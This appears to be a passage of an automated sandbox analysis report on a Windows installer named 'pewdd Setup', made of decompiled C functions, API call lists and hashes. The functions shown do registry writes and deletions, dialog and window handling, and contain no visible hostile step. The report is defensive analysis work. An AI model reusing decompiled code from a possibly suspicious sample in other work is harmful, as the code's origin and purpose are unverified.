                                                • String ID: (%p)->(%s %p)$(%p)->(IID_IEnumTfInputProcessorProfiles %p)$(%p)->(IID_IUnknown %p)
                                                • API String ID: 2931989736-4158896418
                                                • Opcode ID: 2b89f4c4769a64c7a0d6ce6b13d4f49c4649fb8cbbf102c691703ca80465367c
                                                • Instruction ID: f3b920d8975c3dec4e6abf0cee72002c753e868fc46b7393072c9faba082f327
                                                • Opcode Fuzzy Hash: 2b89f4c4769a64c7a0d6ce6b13d4f49c4649fb8cbbf102c691703ca80465367c
                                                • Instruction Fuzzy Hash: 85211AF9D00209EBEB00DFA4DC41FEE73B4EB98280F148468F9149B345E631EA608B55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E004022F5(void* __eax) {
                                                				void* _t15;
                                                				char* _t18;
                                                				int _t19;
                                                				char _t24;
                                                				int _t27;
                                                				signed int _t30;
                                                				intOrPtr _t35;
                                                				void* _t37;
                                                
                                                				_t15 = E00402ADD(__eax);
                                                				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                                				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                                				 *(_t37 - 0x44) = E004029E8(2);
                                                				_t18 = E004029E8(0x11);
                                                				_t30 =  *0x42ec10; // 0x0
                                                				 *(_t37 - 4) = 1;
                                                				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                                				if(_t19 == 0) {
                                                					if(_t35 == 1) {
                                                						E004029E8(0x23);
                                                						_t19 = lstrlenA(0x40a378) + 1;
                                                					}
                                                					if(_t35 == 4) {
                                                						_t24 = E004029CB(3);
                                                						 *0x40a378 = _t24;
                                                						_t19 = _t35;
                                                					}
                                                					if(_t35 == 3) {
                                                						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
                                                					}
                                                					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
                                                						 *(_t37 - 4) = _t27;
                                                					}
                                                					_push( *(_t37 + 8));
                                                					RegCloseKey();
                                                				}
                                                				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
                                                				return 0;
                                                			}












                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nshA78C.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nshA78C.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nshA78C.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nshA78C.tmp
                                                • API String ID: 1356686001-3227806388
                                                • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                                • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 10001720
                                                • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001772
                                                • RegCloseKey.ADVAPI32(?), ref: 10001787
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CloseCreateFromString
                                                • String ID: %s\%s$(%p) %s
                                                • API String ID: 1280075732-2567790950
                                                • Opcode ID: e7468081566d5fcf6fde2c48bc0af18005790df0dad083f9e5615e3b09c16f0b
                                                • Instruction ID: 4d155ae1e09500c75846c1e235b1cef34e51d61da081fdf85d17d56b8df688a2
                                                • Opcode Fuzzy Hash: e7468081566d5fcf6fde2c48bc0af18005790df0dad083f9e5615e3b09c16f0b
                                                • Instruction Fuzzy Hash: E61186F6900208BBF710DBA0DC46FEE73BCEB48740F008458F709AA185EA71E68487A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 100017E3
                                                • RegDeleteTreeW.ADVAPI32(80000002,?), ref: 10001825
                                                • RegDeleteTreeW.ADVAPI32(80000001,?), ref: 10001837
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: DeleteTree$FromString
                                                • String ID: %s\%s$(%p) %s
                                                • API String ID: 1665489665-2567790950
                                                • Opcode ID: 06eab0ba4ac2e8f73a71aeefc6ef192684b9224c0b5c94a13ff5f3e4daec22c1
                                                • Instruction ID: cb02e4e582c7cc0f95aeb8399e39fc8d2ae1a72fe76550b5b7d06ead11313e83
                                                • Opcode Fuzzy Hash: 06eab0ba4ac2e8f73a71aeefc6ef192684b9224c0b5c94a13ff5f3e4daec22c1
                                                • Instruction Fuzzy Hash: 9A01E1F6800118EBFB10DBA49C45F9A73BCEB58305F00C155F60996105EA31EB988BB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegCloseKey.ADVAPI32(?), ref: 10002E9B
                                                • RegCloseKey.ADVAPI32(00000000), ref: 10002EB1
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 10002ED1
                                                • HeapFree.KERNEL32(00000000), ref: 10002ED8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CloseHeap$FreeProcess
                                                • String ID: destroying %p
                                                • API String ID: 3033025533-3738993722
                                                • Opcode ID: 2d4eebfb721ce51961bd45fd4414be31e4c3001adc575808792bb9bb990f7086
                                                • Instruction ID: 5b59283f2627399bb63ea5609936be5ff8c51f2501e8e7f4a00345534743b0d8
                                                • Opcode Fuzzy Hash: 2d4eebfb721ce51961bd45fd4414be31e4c3001adc575808792bb9bb990f7086
                                                • Instruction Fuzzy Hash: FFF079B9210208AFD701DF54C884EAA77A9FB8D355F11C148F9098B365C735E981CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E00402A28(void* _a4, char* _a8, long _a12) {
                                                				void* _v8;
                                                				char _v272;
                                                				signed char _t16;
                                                				long _t18;
                                                				long _t25;
                                                				intOrPtr* _t27;
                                                				long _t28;
                                                
                                                				_t16 =  *0x42ec10; // 0x0
                                                				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                                				if(_t18 == 0) {
                                                					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                						__eflags = _a12;
                                                						if(_a12 != 0) {
                                                							RegCloseKey(_v8);
                                                							L8:
                                                							__eflags = 1;
                                                							return 1;
                                                						}
                                                						_t25 = E00402A28(_v8,  &_v272, 0);
                                                						__eflags = _t25;
                                                						if(_t25 != 0) {
                                                							break;
                                                						}
                                                					}
                                                					RegCloseKey(_v8);
                                                					_t27 = E00405C49(2);
                                                					if(_t27 == 0) {
                                                						__eflags =  *0x42ec10; // 0x0
                                                						if(__eflags != 0) {
                                                							goto L8;
                                                						}
                                                						_t28 = RegDeleteKeyA(_a4, _a8);
                                                						__eflags = _t28;
                                                						if(_t28 != 0) {
                                                							goto L8;
                                                						}
                                                						return _t28;
                                                					}
                                                					return  *_t27(_a4, _a8,  *0x42ec10, 0);
                                                				}
                                                				return _t18;
                                                			}











                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                                • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                                • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                                • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00401CC1(int __edx) {
                                                				void* _t17;
                                                				struct HINSTANCE__* _t21;
                                                				struct HWND__* _t25;
                                                				void* _t27;
                                                
                                                				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                                				GetClientRect(_t25, _t27 - 0x40);
                                                				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                				if(_t17 != _t21) {
                                                					DeleteObject(_t17);
                                                				}
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
                                                				return 0;
                                                			}








                                                APIs
                                                • GetDlgItem.USER32 ref: 00401CC5
                                                • GetClientRect.USER32 ref: 00401CD2
                                                • LoadImageA.USER32 ref: 00401CF3
                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                • DeleteObject.GDI32(00000000), ref: 00401D10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                                • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Enum
                                                • String ID: '$(%p)
                                                • API String ID: 2928410991-2641672736
                                                • Opcode ID: 994c6d8ff00e08bfe5ee1204041381d4bf1522d92665c9bf50870adcbdb19640
                                                • Instruction ID: 98191913a28e9ee06ca6f64768706f42858422ad3805355979cfa24b6b1692b0
                                                • Opcode Fuzzy Hash: 994c6d8ff00e08bfe5ee1204041381d4bf1522d92665c9bf50870adcbdb19640
                                                • Instruction Fuzzy Hash: AB4129B4D00209EFEB05CF98C985B9EB7F5FB48354F20C569E815AB285C774AA80DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                 • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Enum
                                                • String ID: '$(%p)
                                                • API String ID: 2928410991-2641672736
                                                • Opcode ID: 10460304ef76f539916837472c472869d160d0106d875de788313cb366d878b2
                                                • Instruction ID: d6f23bb7a891aa4ae65e830c468a68ef75c51dbce02d3a74e318b2ecbae86c09
                                                • Opcode Fuzzy Hash: 10460304ef76f539916837472c472869d160d0106d875de788313cb366d878b2
                                                • Instruction Fuzzy Hash: 393108B4900209EFEB14CF84C888BEEB7F5FB48345F20855AE9056B285D374AE84DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                				char _v36;
                                                				char _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t26;
                                                				void* _t34;
                                                				signed int _t36;
                                                				signed int _t39;
                                                				unsigned int _t46;
                                                
                                                				_t46 = _a12;
                                                				_push(0x14);
                                                				_pop(0);
                                                				_t34 = 0xffffffdc;
                                                				if(_t46 < 0x100000) {
                                                					_push(0xa);
                                                					_pop(0);
                                                					_t34 = 0xffffffdd;
                                                				}
                                                				if(_t46 < 0x400) {
                                                					_t34 = 0xffffffde;
                                                				}
                                                				if(_t46 < 0xffff3333) {
                                                					_t39 = 0x14;
                                                					asm("cdq");
                                                					_t46 = _t46 + 1 / _t39;
                                                				}
                                                				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
                                                				_t21 = _t46 & 0x00ffffff;
                                                				_t36 = 0xa;
                                                				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                				_push(_t46 >> 0);
                                                				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
                                                				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
                                                				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
                                                 			}

                                                APIs
                                                • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                                • wsprintfA.USER32 ref: 0040454C
                                                • SetDlgItemTextA.USER32 ref: 0040455F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                                • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E00401BAD() {
                                                				signed int _t28;
                                                				CHAR* _t31;
                                                				long _t32;
                                                				int _t37;
                                                				signed int _t38;
                                                				int _t42;
                                                				int _t48;
                                                				struct HWND__* _t52;
                                                				void* _t55;
                                                
                                                				 *(_t55 - 0x34) = E004029CB(3);
                                                				 *(_t55 + 8) = E004029CB(4);
                                                				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                                                				}
                                                				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                                				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                                					 *(_t55 + 8) = E004029E8(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t50 = E004029E8();
                                                					_t28 = E004029E8();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t31 =  ~( *_t27) & _t50;
                                                					__eflags = _t31;
                                                					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                					goto L10;
                                                				} else {
                                                					_t52 = E004029CB();
                                                					_t37 = E004029CB();
                                                					_t48 =  *(_t55 - 0x10) >> 2;
                                                					if(__eflags == 0) {
                                                						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                                						L10:
                                                						 *(_t55 - 8) = _t32;
                                                					} else {
                                                						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                                				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                                					_push( *(_t55 - 8));
                                                					E00405889();
                                                				}
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
                                                				return 0;
                                                 			}

                                                APIs
                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                                • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                                                • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                                • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040373D(void* __ecx, void* __eflags) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed short _t6;
                                                				intOrPtr _t11;
                                                				signed int _t13;
                                                				intOrPtr _t15;
                                                				signed int _t16;
                                                				signed short* _t18;
                                                				signed int _t20;
                                                				signed short* _t23;
                                                				intOrPtr _t25;
                                                				signed int _t26;
                                                				intOrPtr* _t27;
                                                
                                                				_t24 = "1033";
                                                				_t13 = 0xffff;
                                                				_t6 = E004058A2(__ecx, "1033");
                                                				while(1) {
                                                					_t26 =  *0x42eba4; // 0x1
                                                					if(_t26 == 0) {
                                                						goto L7;
                                                					}
                                                					_t15 =  *0x42eb70; // 0x571350
                                                					_t16 =  *(_t15 + 0x64);
                                                					_t20 =  ~_t16;
                                                					_t18 = _t16 * _t26 +  *0x42eba0;
                                                					while(1) {
                                                						_t18 = _t18 + _t20;
                                                						_t26 = _t26 - 1;
                                                						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                							break;
                                                						}
                                                						if(_t26 != 0) {
                                                							continue;
                                                						}
                                                						goto L7;
                                                					}
                                                					 *0x42e340 = _t18[1];
                                                					 *0x42ec08 = _t18[3];
                                                					_t23 =  &(_t18[5]);
                                                					if(_t23 != 0) {
                                                						 *0x42e33c = _t23;
                                                						E00405889(_t24,  *_t18 & 0x0000ffff);
                                                						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "pewdd Setup", 0xfffffffe));
                                                						_t11 =  *0x42eb8c; // 0x2
                                                						_t27 =  *0x42eb88; // 0x5714fc
                                                						if(_t11 == 0) {
                                                							L15:
                                                							return _t11;
                                                						}
                                                						_t25 = _t11;
                                                						do {
                                                							_t11 =  *_t27;
                                                							if(_t11 != 0) {
                                                								_t5 = _t27 + 0x18; // 0x571514
                                                								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
                                                							}
                                                							_t27 = _t27 + 0x418;
                                                							_t25 = _t25 - 1;
                                                						} while (_t25 != 0);
                                                						goto L15;
                                                					}
                                                					L7:
                                                					if(_t13 != 0xffff) {
                                                						_t13 = 0;
                                                					} else {
                                                						_t13 = 0x3ff;
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                • SetWindowTextA.USER32(00000000,pewdd Setup), ref: 004037D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\$pewdd Setup
                                                • API String ID: 530164218-3395851509
                                                • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                                • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __woutput_l.LIBCMT ref: 1000DBEC
                                                  • Part of subcall function 1000ECAB: __getptd_noexit.LIBCMT ref: 1000ECAB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                 • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __getptd_noexit__woutput_l
                                                • String ID: B
                                                • API String ID: 3669879410-1255198513
                                                • Opcode ID: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                                                • Instruction ID: 364e4ebba8070adea721101281f6a2cfad84ec0809f21dc11fd63d115f74d872
                                                • Opcode Fuzzy Hash: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                                                • Instruction Fuzzy Hash: 4A11517190421D9EAF00EFA4DC819EE77B8FF08354F10412BE814A6185EA355905CB75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000014), ref: 10002AB5
                                                • HeapAlloc.KERNEL32(00000000), ref: 10002ABC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                 • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID: returning %p
                                                • API String ID: 1617791916-1981732286
                                                • Opcode ID: 18d273de328fa26a1ca35548bb89007e5bb946fe18a21b53f1fc2e5f3bf999df
                                                • Instruction ID: 19f7ab8b2faa8bf384bb5050bba3a5ca35940cf43705d348629620c12c1df635
                                                • Opcode Fuzzy Hash: 18d273de328fa26a1ca35548bb89007e5bb946fe18a21b53f1fc2e5f3bf999df
                                                • Instruction Fuzzy Hash: 111109B8A00208EFE701CF94C945B99B7F0EB49355F208198E9095B356D77ADE80DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040518B(CHAR* _a4) {
                                                				struct _PROCESS_INFORMATION _v20;
                                                				int _t7;
                                                
                                                				0x42bfe0->cb = 0x44;
